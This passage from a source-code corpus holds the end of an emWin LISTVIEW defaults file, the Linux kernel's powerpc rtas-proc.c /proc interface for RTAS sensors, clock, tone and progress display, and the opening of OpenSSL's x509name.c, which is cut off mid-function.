  /* Install the new default font and hand back the one it replaces so the
   * caller can restore it later. */
  const GUI_FONT GUI_UNI_PTR * pPrevFont;
  pPrevFont = LISTVIEW_DefaultProps.pFont;
  LISTVIEW_DefaultProps.pFont = pFont;
  return pPrevFont;
}
/*********************************************************************
*
* LISTVIEW_SetDefaultTextColor
*/
GUI_COLOR LISTVIEW_SetDefaultTextColor(unsigned Index, GUI_COLOR Color) {
  /* Replace one default text color, returning the previous value.
   * Out-of-range indices are ignored and 0 is returned. */
  GUI_COLOR PrevColor;
  if (Index >= GUI_COUNTOF(LISTVIEW_DefaultProps.aTextColor)) {
    return 0;
  }
  PrevColor = LISTVIEW_DefaultProps.aTextColor[Index];
  LISTVIEW_DefaultProps.aTextColor[Index] = Color;
  return PrevColor;
}
/*********************************************************************
*
* LISTVIEW_SetDefaultBkColor
*/
GUI_COLOR LISTVIEW_SetDefaultBkColor(unsigned Index, GUI_COLOR Color) {
  /* Replace one default background color, returning the previous value.
   * Out-of-range indices are ignored and 0 is returned. */
  GUI_COLOR PrevColor;
  if (Index >= GUI_COUNTOF(LISTVIEW_DefaultProps.aBkColor)) {
    return 0;
  }
  PrevColor = LISTVIEW_DefaultProps.aBkColor[Index];
  LISTVIEW_DefaultProps.aBkColor[Index] = Color;
  return PrevColor;
}
/*********************************************************************
*
* LISTVIEW_SetDefaultGridColor
*/
GUI_COLOR LISTVIEW_SetDefaultGridColor(GUI_COLOR Color) {
  /* Exchange the default grid color, returning the value it replaces. */
  GUI_COLOR PrevColor = LISTVIEW_DefaultProps.GridColor;
  LISTVIEW_DefaultProps.GridColor = Color;
  return PrevColor;
}
#else /* Avoid problems with empty object modules */
void LISTVIEW_Default_C(void) {} /* dummy symbol so the object module is never empty */
#endif
/*************************** End of file ****************************/
| gpl-2.0 |
jeffegg/beaglebone | arch/powerpc/kernel/rtas-proc.c | 2 | 23239 | /*
* Copyright (C) 2000 Tilmann Bitterberg
* (tilmann@bitterberg.de)
*
* RTAS (Runtime Abstraction Services) stuff
* Intention is to provide a clean user interface
* to use the RTAS.
*
* TODO:
* Split off a header file and maybe move it to a different
* location. Write Documentation on what the /proc/rtas/ entries
* actually do.
*/
#include <linux/errno.h>
#include <linux/sched.h>
#include <linux/proc_fs.h>
#include <linux/stat.h>
#include <linux/ctype.h>
#include <linux/time.h>
#include <linux/string.h>
#include <linux/init.h>
#include <linux/seq_file.h>
#include <linux/bitops.h>
#include <linux/rtc.h>
#include <asm/uaccess.h>
#include <asm/processor.h>
#include <asm/io.h>
#include <asm/prom.h>
#include <asm/rtas.h>
#include <asm/machdep.h> /* for ppc_md */
#include <asm/time.h>
/* Token for Sensors */
#define KEY_SWITCH 0x0001
#define ENCLOSURE_SWITCH 0x0002
#define THERMAL_SENSOR 0x0003
#define LID_STATUS 0x0004
#define POWER_SOURCE 0x0005
#define BATTERY_VOLTAGE 0x0006
#define BATTERY_REMAINING 0x0007
#define BATTERY_PERCENTAGE 0x0008
#define EPOW_SENSOR 0x0009
#define BATTERY_CYCLESTATE 0x000a
#define BATTERY_CHARGING 0x000b
/* IBM specific sensors */
#define IBM_SURVEILLANCE 0x2328 /* 9000 */
#define IBM_FANRPM 0x2329 /* 9001 */
#define IBM_VOLTAGE 0x232a /* 9002 */
#define IBM_DRCONNECTOR 0x232b /* 9003 */
#define IBM_POWERSUPPLY 0x232c /* 9004 */
/* Status return values */
#define SENSOR_CRITICAL_HIGH 13
#define SENSOR_WARNING_HIGH 12
#define SENSOR_NORMAL 11
#define SENSOR_WARNING_LOW 10
#define SENSOR_CRITICAL_LOW 9
#define SENSOR_SUCCESS 0
#define SENSOR_HW_ERROR -1
#define SENSOR_BUSY -2
#define SENSOR_NOT_EXIST -3
#define SENSOR_DR_ENTITY -9000
/* Location Codes */
#define LOC_SCSI_DEV_ADDR 'A'
#define LOC_SCSI_DEV_LOC 'B'
#define LOC_CPU 'C'
#define LOC_DISKETTE 'D'
#define LOC_ETHERNET 'E'
#define LOC_FAN 'F'
#define LOC_GRAPHICS 'G'
/* reserved / not used 'H' */
#define LOC_IO_ADAPTER 'I'
/* reserved / not used 'J' */
#define LOC_KEYBOARD 'K'
#define LOC_LCD 'L'
#define LOC_MEMORY 'M'
#define LOC_NV_MEMORY 'N'
#define LOC_MOUSE 'O'
#define LOC_PLANAR 'P'
#define LOC_OTHER_IO 'Q'
#define LOC_PARALLEL 'R'
#define LOC_SERIAL 'S'
#define LOC_DEAD_RING 'T'
#define LOC_RACKMOUNTED 'U' /* for _u_nit is rack mounted */
#define LOC_VOLTAGE 'V'
#define LOC_SWITCH_ADAPTER 'W'
#define LOC_OTHER 'X'
#define LOC_FIRMWARE 'Y'
#define LOC_SCSI 'Z'
/* Tokens for indicators */
#define TONE_FREQUENCY 0x0001 /* 0 - 1000 (HZ)*/
#define TONE_VOLUME 0x0002 /* 0 - 100 (%) */
#define SYSTEM_POWER_STATE 0x0003
#define WARNING_LIGHT 0x0004
#define DISK_ACTIVITY_LIGHT 0x0005
#define HEX_DISPLAY_UNIT 0x0006
#define BATTERY_WARNING_TIME 0x0007
#define CONDITION_CYCLE_REQUEST 0x0008
#define SURVEILLANCE_INDICATOR 0x2328 /* 9000 */
#define DR_ACTION 0x2329 /* 9001 */
#define DR_INDICATOR 0x232a /* 9002 */
/* 9003 - 9004: Vendor specific */
/* 9006 - 9999: Vendor specific */
/* other */
#define MAX_SENSORS 17 /* I only know of 17 sensors */
#define MAX_LINELENGTH 256
#define SENSOR_PREFIX "ibm,sensor-"
#define cel_to_fahr(x) ((x*9/5)+32)
/* Globals */
static struct rtas_sensors sensors;
static struct device_node *rtas_node = NULL;
static unsigned long power_on_time = 0; /* Save the time the user set */
static char progress_led[MAX_LINELENGTH];
static unsigned long rtas_tone_frequency = 1000;
static unsigned long rtas_tone_volume = 0;
/* ****************STRUCTS******************************************* */
/* One sensor type as reported by the device tree. */
struct individual_sensor {
	unsigned int token;	/* RTAS sensor token (KEY_SWITCH, IBM_FANRPM, ...) */
	unsigned int quant;	/* per-type instance count; iterated 0..quant inclusive */
};
/* All sensors parsed from the rtas node's "rtas-sensors" property. */
struct rtas_sensors {
	struct individual_sensor sensor[MAX_SENSORS];
	unsigned int quant;	/* number of valid entries in sensor[] */
};
/* ****************************************************************** */
/* Declarations */
static int ppc_rtas_sensors_show(struct seq_file *m, void *v);
static int ppc_rtas_clock_show(struct seq_file *m, void *v);
static ssize_t ppc_rtas_clock_write(struct file *file,
const char __user *buf, size_t count, loff_t *ppos);
static int ppc_rtas_progress_show(struct seq_file *m, void *v);
static ssize_t ppc_rtas_progress_write(struct file *file,
const char __user *buf, size_t count, loff_t *ppos);
static int ppc_rtas_poweron_show(struct seq_file *m, void *v);
static ssize_t ppc_rtas_poweron_write(struct file *file,
const char __user *buf, size_t count, loff_t *ppos);
static ssize_t ppc_rtas_tone_freq_write(struct file *file,
const char __user *buf, size_t count, loff_t *ppos);
static int ppc_rtas_tone_freq_show(struct seq_file *m, void *v);
static ssize_t ppc_rtas_tone_volume_write(struct file *file,
const char __user *buf, size_t count, loff_t *ppos);
static int ppc_rtas_tone_volume_show(struct seq_file *m, void *v);
static int ppc_rtas_rmo_buf_show(struct seq_file *m, void *v);
/*
 * seq_file plumbing for the /proc/powerpc/rtas files: each file has a
 * trivial open wrapper that binds its show routine via single_open(),
 * plus a file_operations table; writable files also wire up their write
 * handler.
 */
static int sensors_open(struct inode *inode, struct file *file)
{
	return single_open(file, ppc_rtas_sensors_show, NULL);
}
static const struct file_operations ppc_rtas_sensors_operations = {
	.open		= sensors_open,
	.read		= seq_read,
	.llseek		= seq_lseek,
	.release	= single_release,
};
static int poweron_open(struct inode *inode, struct file *file)
{
	return single_open(file, ppc_rtas_poweron_show, NULL);
}
static const struct file_operations ppc_rtas_poweron_operations = {
	.open		= poweron_open,
	.read		= seq_read,
	.llseek		= seq_lseek,
	.write		= ppc_rtas_poweron_write,
	.release	= single_release,
};
static int progress_open(struct inode *inode, struct file *file)
{
	return single_open(file, ppc_rtas_progress_show, NULL);
}
static const struct file_operations ppc_rtas_progress_operations = {
	.open		= progress_open,
	.read		= seq_read,
	.llseek		= seq_lseek,
	.write		= ppc_rtas_progress_write,
	.release	= single_release,
};
static int clock_open(struct inode *inode, struct file *file)
{
	return single_open(file, ppc_rtas_clock_show, NULL);
}
static const struct file_operations ppc_rtas_clock_operations = {
	.open		= clock_open,
	.read		= seq_read,
	.llseek		= seq_lseek,
	.write		= ppc_rtas_clock_write,
	.release	= single_release,
};
static int tone_freq_open(struct inode *inode, struct file *file)
{
	return single_open(file, ppc_rtas_tone_freq_show, NULL);
}
static const struct file_operations ppc_rtas_tone_freq_operations = {
	.open		= tone_freq_open,
	.read		= seq_read,
	.llseek		= seq_lseek,
	.write		= ppc_rtas_tone_freq_write,
	.release	= single_release,
};
static int tone_volume_open(struct inode *inode, struct file *file)
{
	return single_open(file, ppc_rtas_tone_volume_show, NULL);
}
static const struct file_operations ppc_rtas_tone_volume_operations = {
	.open		= tone_volume_open,
	.read		= seq_read,
	.llseek		= seq_lseek,
	.write		= ppc_rtas_tone_volume_write,
	.release	= single_release,
};
static int rmo_buf_open(struct inode *inode, struct file *file)
{
	return single_open(file, ppc_rtas_rmo_buf_show, NULL);
}
/* rmo_buffer is read-only: no .write handler. */
static const struct file_operations ppc_rtas_rmo_buf_ops = {
	.open		= rmo_buf_open,
	.read		= seq_read,
	.llseek		= seq_lseek,
	.release	= single_release,
};
static int ppc_rtas_find_all_sensors(void);
static void ppc_rtas_process_sensor(struct seq_file *m,
struct individual_sensor *s, int state, int error, const char *loc);
static char *ppc_rtas_process_error(int error);
static void get_location_code(struct seq_file *m,
struct individual_sensor *s, const char *loc);
static void check_location_string(struct seq_file *m, const char *c);
static void check_location(struct seq_file *m, const char *c);
/*
 * Create the /proc/powerpc/rtas/* entries.  Bails out with -ENODEV on
 * non-pseries machines or when the device tree has no "rtas" node.
 */
static int __init proc_rtas_init(void)
{
	if (!machine_is(pseries))
		return -ENODEV;

	rtas_node = of_find_node_by_name(NULL, "rtas");
	if (rtas_node == NULL)
		return -ENODEV;

	proc_create("powerpc/rtas/progress", S_IRUGO|S_IWUSR, NULL,
		    &ppc_rtas_progress_operations);
	proc_create("powerpc/rtas/clock", S_IRUGO|S_IWUSR, NULL,
		    &ppc_rtas_clock_operations);
	proc_create("powerpc/rtas/poweron", S_IWUSR|S_IRUGO, NULL,
		    &ppc_rtas_poweron_operations);
	proc_create("powerpc/rtas/sensors", S_IRUGO, NULL,
		    &ppc_rtas_sensors_operations);
	proc_create("powerpc/rtas/frequency", S_IWUSR|S_IRUGO, NULL,
		    &ppc_rtas_tone_freq_operations);
	proc_create("powerpc/rtas/volume", S_IWUSR|S_IRUGO, NULL,
		    &ppc_rtas_tone_volume_operations);
	/* rmo_buffer exposes memory contents: owner-readable only */
	proc_create("powerpc/rtas/rmo_buffer", S_IRUSR, NULL,
		    &ppc_rtas_rmo_buf_ops);
	return 0;
}
__initcall(proc_rtas_init);
/*
 * Copy a decimal number from userspace and parse it.  On success returns 0
 * with the value in *val; returns -EINVAL for oversized or malformed input
 * and -EFAULT if the user buffer cannot be read.  A single trailing
 * newline after the digits is accepted.
 */
static int parse_number(const char __user *p, size_t count, unsigned long *val)
{
	char tmp[40];
	char *stop;

	if (count > sizeof(tmp) - 1)
		return -EINVAL;
	if (copy_from_user(tmp, p, count))
		return -EFAULT;
	tmp[count] = '\0';

	*val = simple_strtoul(tmp, &stop, 10);
	if (*stop != '\0' && *stop != '\n')
		return -EINVAL;
	return 0;
}
/* ****************************************************************** */
/* POWER-ON-TIME */
/* ****************************************************************** */
/*
 * /proc/powerpc/rtas/poweron write: accept an epoch-seconds value, remember
 * it for the read side, and program the RTAS "set-time-for-power-on"
 * service with the broken-down time.
 */
static ssize_t ppc_rtas_poweron_write(struct file *file,
		const char __user *buf, size_t count, loff_t *ppos)
{
	struct rtc_time tm;
	unsigned long nowtime;
	int error = parse_number(buf, count, &nowtime);
	if (error)
		return error;

	power_on_time = nowtime; /* save the time */

	to_tm(nowtime, &tm);

	error = rtas_call(rtas_token("set-time-for-power-on"), 7, 1, NULL,
			  tm.tm_year, tm.tm_mon, tm.tm_mday,
			  tm.tm_hour, tm.tm_min, tm.tm_sec, 0 /* nano */);
	if (error)
		printk(KERN_WARNING "error: setting poweron time returned: %s\n",
		       ppc_rtas_process_error(error));
	/* the whole input counts as consumed even if RTAS rejected it */
	return count;
}
/* ****************************************************************** */
/* Report the last power-on time written, or a notice if none was set. */
static int ppc_rtas_poweron_show(struct seq_file *m, void *v)
{
	if (power_on_time != 0)
		seq_printf(m, "%lu\n",power_on_time);
	else
		seq_printf(m, "Power on time not set\n");
	return 0;
}
/* ****************************************************************** */
/* PROGRESS */
/* ****************************************************************** */
/*
 * /proc/powerpc/rtas/progress write: store the user's string (truncated to
 * MAX_LINELENGTH-1) and echo it to the RTAS progress display.
 */
static ssize_t ppc_rtas_progress_write(struct file *file,
		const char __user *buf, size_t count, loff_t *ppos)
{
	unsigned long hex;

	if (count >= MAX_LINELENGTH)
		count = MAX_LINELENGTH -1;
	if (copy_from_user(progress_led, buf, count)) { /* save the string */
		return -EFAULT;
	}
	progress_led[count] = 0;

	/*
	 * Also derive a numeric code from any leading digits for the display.
	 * NOTE(review): despite the historical "hexdigits" wording, this
	 * parses base 10 - confirm before "fixing" the radix.
	 */
	hex = simple_strtoul(progress_led, NULL, 10);
	rtas_progress ((char *)progress_led, hex);
	return count;
	/* clear the line */
	/* rtas_progress(" ", 0xffff);*/
}
/* ****************************************************************** */
/* Print the saved progress string; empty until the user writes one. */
static int ppc_rtas_progress_show(struct seq_file *m, void *v)
{
	if (progress_led[0] != '\0')
		seq_printf(m, "%s\n", progress_led);
	return 0;
}
/* ****************************************************************** */
/* CLOCK */
/* ****************************************************************** */
/*
 * /proc/powerpc/rtas/clock write: accept epoch seconds and program the
 * RTAS "set-time-of-day" service with the broken-down time.
 */
static ssize_t ppc_rtas_clock_write(struct file *file,
		const char __user *buf, size_t count, loff_t *ppos)
{
	struct rtc_time tm;
	unsigned long nowtime;
	int error = parse_number(buf, count, &nowtime);
	if (error)
		return error;

	to_tm(nowtime, &tm);
	error = rtas_call(rtas_token("set-time-of-day"), 7, 1, NULL,
			  tm.tm_year, tm.tm_mon, tm.tm_mday,
			  tm.tm_hour, tm.tm_min, tm.tm_sec, 0);
	if (error)
		printk(KERN_WARNING "error: setting the clock returned: %s\n",
		       ppc_rtas_process_error(error));
	/* the whole input counts as consumed even if RTAS rejected it */
	return count;
}
/* ****************************************************************** */
/*
 * /proc/powerpc/rtas/clock read: query the RTAS "get-time-of-day" service
 * and print the result as seconds since the epoch ("0" on error).
 */
static int ppc_rtas_clock_show(struct seq_file *m, void *v)
{
	int ret[8];
	int error = rtas_call(rtas_token("get-time-of-day"), 0, 8, ret);

	if (error) {
		printk(KERN_WARNING "error: reading the clock returned: %s\n",
		       ppc_rtas_process_error(error));
		seq_printf(m, "0");
	} else {
		unsigned int year, mon, day, hour, min, sec;
		year = ret[0]; mon = ret[1]; day = ret[2];
		hour = ret[3]; min = ret[4]; sec = ret[5];
		/* remaining ret[] words (presumably sub-second data) unused */
		seq_printf(m, "%lu\n",
			   mktime(year, mon, day, hour, min, sec));
	}
	return 0;
}
/* ****************************************************************** */
/* SENSOR STUFF */
/* ****************************************************************** */
/*
 * /proc/powerpc/rtas/sensors read: list every sensor instance with its
 * decoded state, RTAS status string and location code.
 */
static int ppc_rtas_sensors_show(struct seq_file *m, void *v)
{
	int i,j;
	int state, error;
	int get_sensor_state = rtas_token("get-sensor-state");

	seq_printf(m, "RTAS (RunTime Abstraction Services) Sensor Information\n");
	seq_printf(m, "Sensor\t\tValue\t\tCondition\tLocation\n");
	seq_printf(m, "********************************************************\n");

	if (ppc_rtas_find_all_sensors() != 0) {
		seq_printf(m, "\nNo sensors are available\n");
		return 0;
	}

	for (i=0; i<sensors.quant; i++) {
		struct individual_sensor *p = &sensors.sensor[i];
		char rstr[64];
		const char *loc;
		int llen, offs;

		/* location strings live in an "ibm,sensor-NNNN" property */
		sprintf (rstr, SENSOR_PREFIX"%04d", p->token);
		loc = of_get_property(rtas_node, rstr, &llen);

		/* A sensor may have multiple instances */
		for (j = 0, offs = 0; j <= p->quant; j++) {
			error =	rtas_call(get_sensor_state, 2, 2, &state,
					  p->token, j);
			ppc_rtas_process_sensor(m, p, state, error, loc);
			seq_putc(m, '\n');
			/* advance to this instance's NUL-separated location */
			if (loc) {
				offs += strlen(loc) + 1;
				loc += strlen(loc) + 1;
				if (offs >= llen)
					loc = NULL;
			}
		}
	}
	return 0;
}
/* ****************************************************************** */
static int ppc_rtas_find_all_sensors(void)
{
const unsigned int *utmp;
int len, i;
utmp = of_get_property(rtas_node, "rtas-sensors", &len);
if (utmp == NULL) {
printk (KERN_ERR "error: could not get rtas-sensors\n");
return 1;
}
sensors.quant = len / 8; /* int + int */
for (i=0; i<sensors.quant; i++) {
sensors.sensor[i].token = *utmp++;
sensors.sensor[i].quant = *utmp++;
}
return 0;
}
/* ****************************************************************** */
/*
* Builds a string of what rtas returned
*/
static char *ppc_rtas_process_error(int error)
{
switch (error) {
case SENSOR_CRITICAL_HIGH:
return "(critical high)";
case SENSOR_WARNING_HIGH:
return "(warning high)";
case SENSOR_NORMAL:
return "(normal)";
case SENSOR_WARNING_LOW:
return "(warning low)";
case SENSOR_CRITICAL_LOW:
return "(critical low)";
case SENSOR_SUCCESS:
return "(read ok)";
case SENSOR_HW_ERROR:
return "(hardware error)";
case SENSOR_BUSY:
return "(busy)";
case SENSOR_NOT_EXIST:
return "(non existent)";
case SENSOR_DR_ENTITY:
return "(dr entity removed)";
default:
return "(UNKNOWN)";
}
}
/* ****************************************************************** */
/*
* Builds a string out of what the sensor said
*/
/*
 * Print one sensor instance: a label for the sensor type, its decoded
 * state (state-name table, temperature pair, or raw number), the RTAS
 * status string and finally the location code.
 */
static void ppc_rtas_process_sensor(struct seq_file *m,
	struct individual_sensor *s, int state, int error, const char *loc)
{
	/* Defined return values */
	const char * key_switch[] = { "Off\t", "Normal\t", "Secure\t",
				      "Maintenance" };
	const char * enclosure_switch[] = { "Closed", "Open" };
	const char * lid_status[] = { " ", "Open", "Closed" };
	const char * power_source[] = { "AC\t", "Battery",
					"AC & Battery" };
	const char * battery_remaining[] = { "Very Low", "Low", "Mid", "High" };
	const char * epow_sensor[] = {
		"EPOW Reset", "Cooling warning", "Power warning",
		"System shutdown", "System halt", "EPOW main enclosure",
		"EPOW power off" };
	const char * battery_cyclestate[] = { "None", "In progress",
					      "Requested" };
	const char * battery_charging[] = { "Charging", "Discharching",
					    "No current flow" };
	const char * ibm_drconnector[] = { "Empty", "Present", "Unusable",
					   "Exchange" };

	int have_strings = 0;	/* state already rendered from a table */
	int num_states = 0;
	int temperature = 0;	/* render state as Celsius/Fahrenheit pair */
	int unknown = 0;	/* suppress status/location for unknown tokens */

	/* What kind of sensor do we have here? */
	switch (s->token) {
	case KEY_SWITCH:
		seq_printf(m, "Key switch:\t");
		num_states = sizeof(key_switch) / sizeof(char *);
		if (state < num_states) {
			seq_printf(m, "%s\t", key_switch[state]);
			have_strings = 1;
		}
		break;
	case ENCLOSURE_SWITCH:
		seq_printf(m, "Enclosure switch:\t");
		num_states = sizeof(enclosure_switch) / sizeof(char *);
		if (state < num_states) {
			seq_printf(m, "%s\t",
				   enclosure_switch[state]);
			have_strings = 1;
		}
		break;
	case THERMAL_SENSOR:
		seq_printf(m, "Temp. (C/F):\t");
		temperature = 1;
		break;
	case LID_STATUS:
		seq_printf(m, "Lid status:\t");
		num_states = sizeof(lid_status) / sizeof(char *);
		if (state < num_states) {
			seq_printf(m, "%s\t", lid_status[state]);
			have_strings = 1;
		}
		break;
	case POWER_SOURCE:
		seq_printf(m, "Power source:\t");
		num_states = sizeof(power_source) / sizeof(char *);
		if (state < num_states) {
			seq_printf(m, "%s\t",
				   power_source[state]);
			have_strings = 1;
		}
		break;
	case BATTERY_VOLTAGE:
		seq_printf(m, "Battery voltage:\t");
		break;
	case BATTERY_REMAINING:
		seq_printf(m, "Battery remaining:\t");
		num_states = sizeof(battery_remaining) / sizeof(char *);
		if (state < num_states)
		{
			seq_printf(m, "%s\t",
				   battery_remaining[state]);
			have_strings = 1;
		}
		break;
	case BATTERY_PERCENTAGE:
		seq_printf(m, "Battery percentage:\t");
		break;
	case EPOW_SENSOR:
		seq_printf(m, "EPOW Sensor:\t");
		num_states = sizeof(epow_sensor) / sizeof(char *);
		if (state < num_states) {
			seq_printf(m, "%s\t", epow_sensor[state]);
			have_strings = 1;
		}
		break;
	case BATTERY_CYCLESTATE:
		seq_printf(m, "Battery cyclestate:\t");
		num_states = sizeof(battery_cyclestate) /
			     sizeof(char *);
		if (state < num_states) {
			seq_printf(m, "%s\t",
				   battery_cyclestate[state]);
			have_strings = 1;
		}
		break;
	case BATTERY_CHARGING:
		seq_printf(m, "Battery Charging:\t");
		num_states = sizeof(battery_charging) / sizeof(char *);
		if (state < num_states) {
			seq_printf(m, "%s\t",
				   battery_charging[state]);
			have_strings = 1;
		}
		break;
	case IBM_SURVEILLANCE:
		seq_printf(m, "Surveillance:\t");
		break;
	case IBM_FANRPM:
		seq_printf(m, "Fan (rpm):\t");
		break;
	case IBM_VOLTAGE:
		seq_printf(m, "Voltage (mv):\t");
		break;
	case IBM_DRCONNECTOR:
		seq_printf(m, "DR connector:\t");
		num_states = sizeof(ibm_drconnector) / sizeof(char *);
		if (state < num_states) {
			seq_printf(m, "%s\t",
				   ibm_drconnector[state]);
			have_strings = 1;
		}
		break;
	case IBM_POWERSUPPLY:
		seq_printf(m, "Powersupply:\t");
		break;
	default:
		seq_printf(m, "Unknown sensor (type %d), ignoring it\n",
			   s->token);
		unknown = 1;
		have_strings = 1;
		break;
	}
	/* No table entry matched: print the raw state numerically. */
	if (have_strings == 0) {
		if (temperature) {
			seq_printf(m, "%4d /%4d\t", state, cel_to_fahr(state));
		} else
			seq_printf(m, "%10d\t", state);
	}
	if (unknown == 0) {
		seq_printf(m, "%s\t", ppc_rtas_process_error(error));
		get_location_code(m, s, loc);
	}
}
/* ****************************************************************** */
/*
 * Decode a single two-character location token: the first character selects
 * the component class, the second is its instance number.
 */
static void check_location(struct seq_file *m, const char *c)
{
	const char *label;

	switch (c[0]) {
	case LOC_PLANAR:
		label = "Planar";
		break;
	case LOC_CPU:
		label = "CPU";
		break;
	case LOC_FAN:
		label = "Fan";
		break;
	case LOC_RACKMOUNTED:
		label = "Rack";
		break;
	case LOC_VOLTAGE:
		label = "Voltage";
		break;
	case LOC_LCD:
		label = "LCD";
		break;
	case '.':
		/* '.' marks an abbreviated location code */
		seq_printf(m, "- %c", c[1]);
		return;
	default:
		seq_printf(m, "Unknown location");
		return;
	}
	seq_printf(m, "%s #%c", label, c[1]);
}
/* ****************************************************************** */
/*
* Format:
* ${LETTER}${NUMBER}[[-/]${LETTER}${NUMBER} [ ... ] ]
* the '.' may be an abbreviation
*/
/*
 * Walk a full location-code string, decoding each alphabetic (or '.')
 * token and rendering the '/' and '-' separators as " at ".
 */
static void check_location_string(struct seq_file *m, const char *c)
{
	for (; *c != '\0'; c++) {
		if (isalpha(*c) || *c == '.')
			check_location(m, c);
		else if (*c == '/' || *c == '-')
			seq_printf(m, " at ");
	}
}
/* ****************************************************************** */
static void get_location_code(struct seq_file *m, struct individual_sensor *s,
const char *loc)
{
if (!loc || !*loc) {
seq_printf(m, "---");/* does not have a location */
} else {
check_location_string(m, loc);
}
seq_putc(m, ' ');
}
/* ****************************************************************** */
/* INDICATORS - Tone Frequency */
/* ****************************************************************** */
/*
 * /proc write handler: parse a tone frequency from userspace and push it
 * to firmware via the RTAS "set-indicator" call (indicator TONE_FREQUENCY).
 * Returns 'count' even if the RTAS call fails — the failure is only logged.
 */
static ssize_t ppc_rtas_tone_freq_write(struct file *file,
const char __user *buf, size_t count, loff_t *ppos)
{
unsigned long freq;
/* parse_number copies from the user buffer and converts; nonzero = error */
int error = parse_number(buf, count, &freq);
if (error)
return error;
rtas_tone_frequency = freq; /* save it for later */
error = rtas_call(rtas_token("set-indicator"), 3, 1, NULL,
TONE_FREQUENCY, 0, freq);
if (error)
printk(KERN_WARNING "error: setting tone frequency returned: %s\n",
ppc_rtas_process_error(error));
return count;
}
/* ****************************************************************** */
/* /proc read handler: report the last tone frequency written via this file. */
static int ppc_rtas_tone_freq_show(struct seq_file *m, void *v)
{
seq_printf(m, "%lu\n", rtas_tone_frequency);
return 0;
}
/* ****************************************************************** */
/* INDICATORS - Tone Volume */
/* ****************************************************************** */
/*
 * /proc write handler: parse a tone volume (clamped to 0..100) and push it
 * to firmware via the RTAS "set-indicator" call (indicator TONE_VOLUME).
 * Returns 'count' even if the RTAS call fails — the failure is only logged.
 */
static ssize_t ppc_rtas_tone_volume_write(struct file *file,
const char __user *buf, size_t count, loff_t *ppos)
{
unsigned long volume;
int error = parse_number(buf, count, &volume);
if (error)
return error;
/* firmware expects a percentage; silently clamp oversized values */
if (volume > 100)
volume = 100;
rtas_tone_volume = volume; /* save it for later */
error = rtas_call(rtas_token("set-indicator"), 3, 1, NULL,
TONE_VOLUME, 0, volume);
if (error)
printk(KERN_WARNING "error: setting tone volume returned: %s\n",
ppc_rtas_process_error(error));
return count;
}
/* ****************************************************************** */
/* /proc read handler: report the last tone volume written via this file. */
static int ppc_rtas_tone_volume_show(struct seq_file *m, void *v)
{
seq_printf(m, "%lu\n", rtas_tone_volume);
return 0;
}
#define RMO_READ_BUF_MAX 30
/* RTAS Userspace access */
/*
 * /proc read handler: report the base address and size of the RTAS RMO
 * (real-mode) buffer reserved for userspace RTAS calls.
 * NOTE(review): this exposes a raw kernel buffer address to userspace —
 * confirm the file's permissions restrict it appropriately.
 */
static int ppc_rtas_rmo_buf_show(struct seq_file *m, void *v)
{
seq_printf(m, "%016lx %x\n", rtas_rmo_buf, RTAS_RMOBUF_MAX);
return 0;
}
| gpl-2.0 |
hajuuk/R7000 | ap/gpl/transmission/openssl/crypto/x509/x509name.c | 2 | 10762 | /* crypto/x509/x509name.c */
/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
* All rights reserved.
*
* This package is an SSL implementation written
* by Eric Young (eay@cryptsoft.com).
* The implementation was written so as to conform with Netscapes SSL.
*
* This library is free for commercial and non-commercial use as long as
* the following conditions are aheared to. The following conditions
* apply to all code found in this distribution, be it the RC4, RSA,
* lhash, DES, etc., code; not just the SSL code. The SSL documentation
* included with this distribution is covered by the same copyright terms
* except that the holder is Tim Hudson (tjh@cryptsoft.com).
*
* Copyright remains Eric Young's, and as such any Copyright notices in
* the code are not to be removed.
* If this package is used in a product, Eric Young should be given attribution
* as the author of the parts of the library used.
* This can be in the form of a textual message at program startup or
* in documentation (online or textual) provided with the package.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
* 3. All advertising materials mentioning features or use of this software
* must display the following acknowledgement:
* "This product includes cryptographic software written by
* Eric Young (eay@cryptsoft.com)"
* The word 'cryptographic' can be left out if the rouines from the library
* being used are not cryptographic related :-).
* 4. If you include any Windows specific code (or a derivative thereof) from
* the apps directory (application code) you must include an acknowledgement:
* "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
*
* THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*
* The licence and distribution terms for any publically available version or
* derivative of this code cannot be changed. i.e. this code cannot simply be
* copied and put under another distribution licence
* [including the GNU Public Licence.]
*/
#include <stdio.h>
#include <openssl/stack.h>
#include "cryptlib.h"
#include <openssl/asn1.h>
#include <openssl/objects.h>
#include <openssl/evp.h>
#include <openssl/x509.h>
/*
 * Fetch the text of the first entry matching 'nid'.  Maps the NID to its
 * ASN1 object and delegates to the OBJ variant; -1 on unknown NID.
 */
int X509_NAME_get_text_by_NID(X509_NAME *name, int nid, char *buf, int len)
{
	ASN1_OBJECT *obj = OBJ_nid2obj(nid);

	if (obj == NULL)
		return -1;
	return X509_NAME_get_text_by_OBJ(name, obj, buf, len);
}
/*
 * Copy (truncated, NUL-terminated) the text of the first entry matching
 * 'obj' into 'buf' (capacity 'len').  Returns the number of bytes copied,
 * the full data length when buf is NULL, or -1 when no entry matches.
 */
int X509_NAME_get_text_by_OBJ(X509_NAME *name, ASN1_OBJECT *obj, char *buf,
	     int len)
{
	int i;
	ASN1_STRING *data;

	i = X509_NAME_get_index_by_OBJ(name, obj, -1);
	if (i < 0)
		return -1;
